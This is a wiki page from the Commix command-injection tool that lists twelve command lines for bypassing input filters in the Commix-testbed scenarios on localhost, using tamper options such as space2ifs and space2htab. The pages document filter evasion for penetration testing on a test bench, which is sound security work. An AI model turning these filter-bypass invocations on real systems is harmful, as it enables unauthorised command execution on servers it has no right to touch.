Skip to content

Filters Bypasses

Jump to bottom
Anastasios Stasinopoulos edited this page Mar 26, 2022 · 9 revisions

Note: The following filters bypasses are based on dockerized version of Commix-testbed.

  1. Filter lax_domain_name.php bypass:

python commix.py --url="http://127.0.0.1/scenarios/filters/lax_domain_name.php" --data="addr=127.0.0.1" --suffix="d.e.f"

  1. Filter nested_quotes.php bypass:

python commix.py --url="http://127.0.0.1/scenarios/filters/nested_quotes.php" --data="addr=127.0.0.1" --level=3

  1. Filter no_space.php bypass:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"

  1. Filter no_space_no_colon_no_pipe_no_ampersand.php bypass:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"

  1. Filter no_space_no_colon_no_pipe_no_ampersand_no_dollar.php bypass:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"

  1. Filter no_colon_no_pipe_no_ampersand_no_dollar.php bypass:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"

  1. Filter no_white_chars.php bypass:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars.php" --data="addr=127.0.0.1" --tamper="space2ifs"

  1. Filter no_white_chars_start_alphanum.php bypass:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_start_alphanum.php" --data="addr=127.0.0.1" --tamper="space2ifs"

  1. Filter no_white_chars_stop_alnum.php bypass:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_stop_alnum.php" --data="addr=127.0.0.1" --tamper="space2ifs"

  1. Filter simple_stop_alphanum.php bypass:

python commix.py --url="http://127.0.0.1/scenarios/filters/simple_stop_alphanum.php" --data="addr=127.0.0.1"

  1. Filter simple_start_alphanum.php bypass:

python commix.py --url="http://127.0.0.1/scenarios/filters/simple_start_alphanum.php" --data="addr=127.0.0.1"

  1. Filter multiple_os_commands_blacklisting.php bypass:

python commix.py --url="http://127.0.0.1/scenarios/filters/multiple_os_commands_blacklisting.php" --data="addr=127.0.0.1" --tamper="uninitializedvariable"

At the right side panel, you can find detailed information about Commix Project.

Contents

User's manual

Exploitation

Miscellaneous

Clone this wiki locally